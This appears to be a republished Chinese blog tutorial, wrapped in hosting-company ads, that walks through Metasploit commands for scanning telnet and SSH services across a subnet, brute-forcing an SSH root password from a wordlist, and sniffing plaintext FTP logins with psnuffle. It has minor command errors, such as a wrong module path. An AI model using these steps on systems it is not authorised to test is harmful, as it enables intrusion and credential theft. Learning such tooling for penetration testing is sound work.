Metasploit学习三常见的服务扫描与口令猜解-创新互联
有的时候我们利用了Nmap发现了端口和服务器上的服务器,然而我们并不是专业的hack,很多时候或许我们只能破FTP 共享和telnet,虽然够低端,但是如果你已经在一个局域网中了,上面3个服务器必然会存在。
成都创新互联公司是一家集网站建设,彭泽企业网站建设,彭泽品牌网站建设,网站定制,彭泽网站建设报价,网络营销,网络优化,彭泽网站推广为一体的创新建站企业,帮助传统企业提升企业形象加强企业竞争力。可充分满足这一群体相比中小企业更为丰富、高端、多元的互联网需求。同时我们时刻保持专业、时尚、前沿,时刻以成就客户成长自我,坚持不断学习、思考、沉淀、净化自己,让我们为更多的企业打造出实用型网站。利用telnet来扫描
>search telnet_version 查找telnet扫描模块
>use auxiliary/scanner/telnet/telnet_version 使用该模块
>set RHOSTS 192.168.1.0/24 进行整个网段扫描
>set THREADS 100 设置线程,这个数值可以自己定义
>run
利用ssh来扫描
>search ssh_version 查找ssh扫描模块
>use auxiliary/scanner/telnet/ssh_version 这个版本可能是其他的
>set RHOSTS 192.168.1.0/24 进行整个网段扫描
>set THREADS 100 设置线程,这个数值可以自己定义
>run
利用services来进行扫描的方法都是大同小异,如果想利用其他的services进行扫描,可以先
>search name_version 扫描出具体支持哪些服务,当然这是个积累的过程,常用的扫描还有oracle Mssql mysql等等,当然其实很多时候我们都是在抓瞎,Nmap足以解决问题了,更多的时候我们使用这个工具就是为了后面的猜解和监听做准备,下面就讲解一些猜解方法。
SSH服务口令猜解
SSH服务器相当于windows下的FTP,我想多数管理员是不会配置密码的,因为SSH可以通过公钥配对加密和验证的,而且很难猜解,当然也许有的管理员就设置了账户密码,这样的时候我们就可以利用下面的命令进行猜解了,当然你得有一张足够大的彩虹表
>search ssh 如果熟练了可以直接敲路径了,反正我是记不住,而且模块众多,短时间很难掌握全。
>use auxiliary/scanner/ssh/ssh_login 选择ssh口令猜解模块
>set RHOSTS 192.168.1.105 设置hosts
>set USERNAME root 设置用户名为root
>set set PASS_FILE/root/password.txt 这个字典自己做啦,工具很多,好坏就在于字典了
>set THREADS 50 设置线程数,这个设置多了可能会死机,会拒绝服务,设置少了猜解会慢
>run
因为我不会拿自己的职业生涯开玩笑,所以我只在我自己搭建的环境下试验过,所以效果如何不敢评价,总是不太好吧。
FTP嗅探工具psnuffle
这个工具是嗅探明文传送的FTP的,所以所见即所得,内网破解很实用,尤其是在win系统下,如果是利用IIS搭建的FTP服务,那么你嗅探到的账户肯定具有user权限,而后怎么提权就自己想去吧,如果利用FTP软件,这个账户即使得到个人感觉用处也不大,除非可以获得写权限,这样可以上传shell.好吧,不多讲了,看下psnuffle这个绕口的工具的使用方法:
>use auxiliary/sniffer/psnuffle
>run
当然你如果确定了端口也可以进行一些限制,使用set命令就好,这个嗅探可能需要开那么几个小时,因为谁也不知道啥时候会有人登陆FTP,有的时候我在局域网了,我宁愿做DNS欺骗,感觉这样更加简单暴力,当然,也许直接就被防火墙抓了,呵呵
另外有需要云服务器可以了解下创新互联scvps.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。
本文名称:Metasploit学习三常见的服务扫描与口令猜解-创新互联
URL标题:http://hbruida.cn/article/cejjoe.html